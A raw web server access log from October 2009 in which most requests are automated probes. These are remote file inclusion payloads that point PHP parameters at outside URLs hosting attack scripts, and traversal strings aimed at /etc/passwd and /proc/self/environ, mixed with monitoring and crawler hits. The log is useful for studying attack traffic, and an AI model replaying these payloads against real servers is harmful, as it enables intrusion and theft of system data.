216.108.229.70 - - [22/Oct/2009:01:48:34 -0400] "GET /logs/error_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:34 -0400] "GET //skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:34 -0400] "GET /logs//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:34 -0400] "GET /logs/access_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:35 -0400] "GET //skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:35 -0400] "GET /logs//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:35 -0400] "GET /logs/error_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:35 -0400] "GET /logs/access_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Oct/2009:01:49:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.55.15.155 - - [22/Oct/2009:01:49:15 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.55.15.155 - - [22/Oct/2009:01:49:20 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:49:30 -0400] "GET /logs/access_log.Q109091200//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.140.23.192 - - [22/Oct/2009:01:50:00 -0400] "GET /logs/access_log.Q109091200//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.25.33.99 - - [22/Oct/2009:01:50:09 -0400] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:09 -0400] "GET /logs/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:09 -0400] "GET /logs/access_log.Q109051600/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
98.129.217.53 - - [22/Oct/2009:01:50:21 -0400] "GET /logs/access_log.Q109051700%20%20/newsletter_jobs_subnav.php?cfg[path][contenido]=http://sori.ca/bbs/skin/emovie/Fx29ID1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
98.129.217.53 - - [22/Oct/2009:01:50:26 -0400] "GET /logs/access_log.Q109082500%20%20/newsletter_jobs_subnav.php?cfg[path][contenido]=http://sori.ca/bbs/skin/emovie/Fx29ID1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:35 -0400] "GET /logs/access_log.Q109051700/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:42 -0400] "GET /logs/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:43 -0400] "GET /logs/access_log.Q109051600/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:43 -0400] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:50:43 -0400] "GET /logs/access_log.Q109090100/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:19 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:19 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:19 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:25 -0400] "GET /logs/access_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:51:28 -0400] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:51:28 -0400] "GET /logs/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:51:28 -0400] "GET /logs/access_log.Q109051600%20%20/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:43 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:43 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:43 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
213.25.33.99 - - [22/Oct/2009:01:51:45 -0400] "GET /logs/access_log.Q109051700%20%20/jrBrowser/purchase.php?jamroom[jm_dir]=http://just-walls.ru/_files/session/Fx29ID1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:51:50 -0400] "GET /logs/access_log.Q109100400//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
58.230.118.81 - - [22/Oct/2009:01:51:54 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:54 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:51:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:00 -0400] "GET /logs/access_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:00 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:01 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:00 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:02 -0400] "GET /logs/access_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:13 -0400] "GET /logs/access_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:19 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:19 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:19 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:52:24 -0400] "GET /logs/access_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.249.71.152 - - [22/Oct/2009:01:53:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143704F5AA9E5007D99093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.218.116.164 - - [22/Oct/2009:01:52:23 -0400] "GET /logs/access_log.Q109070300 HTTP/1.0" 200 3011957 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
85.114.140.126 - - [22/Oct/2009:01:53:57 -0400] "GET /logs/access_log.Q109101000/index.php?load=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.806"
85.114.140.126 - - [22/Oct/2009:01:53:58 -0400] "GET /index.php?load=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.806"
85.114.140.126 - - [22/Oct/2009:01:53:58 -0400] "GET /logs/index.php?load=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.806"
85.114.140.126 - - [22/Oct/2009:01:53:58 -0400] "GET /logs/access_log.Q109052700/index.php?load=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.806"
209.59.12.99 - - [22/Oct/2009:01:54:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.230.118.81 - - [22/Oct/2009:01:55:05 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:55:12 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:55:12 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:55:14 -0400] "GET /logs/access_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.182.62.35 - - [22/Oct/2009:01:55:43 -0400] "GET /logs/access_log.Q109051800/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:55:43 -0400] "GET /mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:55:43 -0400] "GET /logs/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:55:43 -0400] "GET /logs/error_log.Q109071800/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
61.47.7.71 - - [22/Oct/2009:01:56:28 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:56:28 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:56:29 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
80.179.238.93 - - [22/Oct/2009:01:56:16 -0400] "GET /logs/access_log.Q109073000 HTTP/1.1" 200 4555164 "-" "kecbnpvtqtbrpwbrtgmac auwvkrhwcm"
62.182.62.35 - - [22/Oct/2009:01:56:54 -0400] "GET /logs/access_log.Q109071200%20/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
85.17.19.172 - - [22/Oct/2009:01:57:07 -0400] "GET /logs///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:07 -0400] "GET /logs/access_log.Q109101000%20%20///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:07 -0400] "GET ///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:10 -0400] "GET ///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:10 -0400] "GET /logs///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:10 -0400] "GET /logs/access_log.Q109101000%20%20///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:12 -0400] "GET ///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:12 -0400] "GET /logs///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:01:57:12 -0400] "GET /logs/access_log.Q109101000%20%20///skin/korean_pride/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:57:20 -0400] "GET ///e404.php?INCLUDE_FOLDER=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:57:20 -0400] "GET /logs/access_log.Q109090900///e404.php?INCLUDE_FOLDER=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:57:20 -0400] "GET /logs/access_log.Q109072900///e404.php?INCLUDE_FOLDER=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:57:20 -0400] "GET /logs///e404.php?INCLUDE_FOLDER=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.190.166.35 - - [22/Oct/2009:01:57:25 -0400] "GET /mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
195.190.166.35 - - [22/Oct/2009:01:57:25 -0400] "GET /logs/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
195.190.166.35 - - [22/Oct/2009:01:57:25 -0400] "GET /logs/access_log.Q109100100/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
195.190.166.35 - - [22/Oct/2009:01:57:32 -0400] "GET /logs/error_log.Q109100100/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
128.121.21.48 - - [22/Oct/2009:01:57:39 -0400] "GET /skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:57:40 -0400] "GET /logs/access_log.Q109081900%20%20/skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:57:40 -0400] "GET /logs/skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.47.7.71 - - [22/Oct/2009:01:57:58 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
150.46.139.203 - - [22/Oct/2009:01:58:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
150.46.139.203 - - [22/Oct/2009:01:58:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
150.46.139.203 - - [22/Oct/2009:01:58:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
150.46.139.203 - - [22/Oct/2009:01:58:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
209.59.12.99 - - [22/Oct/2009:01:59:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.102.6.154 - - [22/Oct/2009:01:59:57 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:59:57 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:59:57 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.182.62.35 - - [22/Oct/2009:02:00:07 -0400] "GET /logs/access_log.Q109051800%20/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
61.47.7.71 - - [22/Oct/2009:02:00:11 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:02:00:11 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:02:00:11 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
216.108.229.70 - - [22/Oct/2009:02:00:29 -0400] "GET /logs/access_log.Q109053100%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:29 -0400] "GET /logs///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:29 -0400] "GET ///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:29 -0400] "GET ///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:29 -0400] "GET /logs/access_log.Q109053100%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:29 -0400] "GET /logs///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:30 -0400] "GET /logs///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:30 -0400] "GET ///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:30 -0400] "GET /logs/access_log.Q109053100%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.207.205.55 - - [22/Oct/2009:02:00:33 -0400] "GET //index5.php?visualizar=./../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "-"
64.207.205.55 - - [22/Oct/2009:02:00:33 -0400] "GET //index5.php?visualizar=./../../../../../../../../proc/self/environ HTTP/1.1" 404 209 "-" "-"
216.108.229.70 - - [22/Oct/2009:02:00:33 -0400] "GET /logs/error_log.Q109051200%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:33 -0400] "GET /logs/error_log.Q109051200%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:34 -0400] "GET /logs/error_log.Q109051200%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:37 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:37 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:37 -0400] "GET /logs/error_log.Q109071800//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:37 -0400] "GET /logs///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:37 -0400] "GET /logs/access_log.Q109053100%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:37 -0400] "GET ///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.47.7.71 - - [22/Oct/2009:02:00:38 -0400] "GET /logs/access_log.Q109062200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
69.175.29.26 - - [22/Oct/2009:02:00:40 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:40 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:40 -0400] "GET /logs/error_log.Q109071800//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:42 -0400] "GET /logs/access_log.Q109080500//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.126.189.35 - - [22/Oct/2009:02:00:43 -0400] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
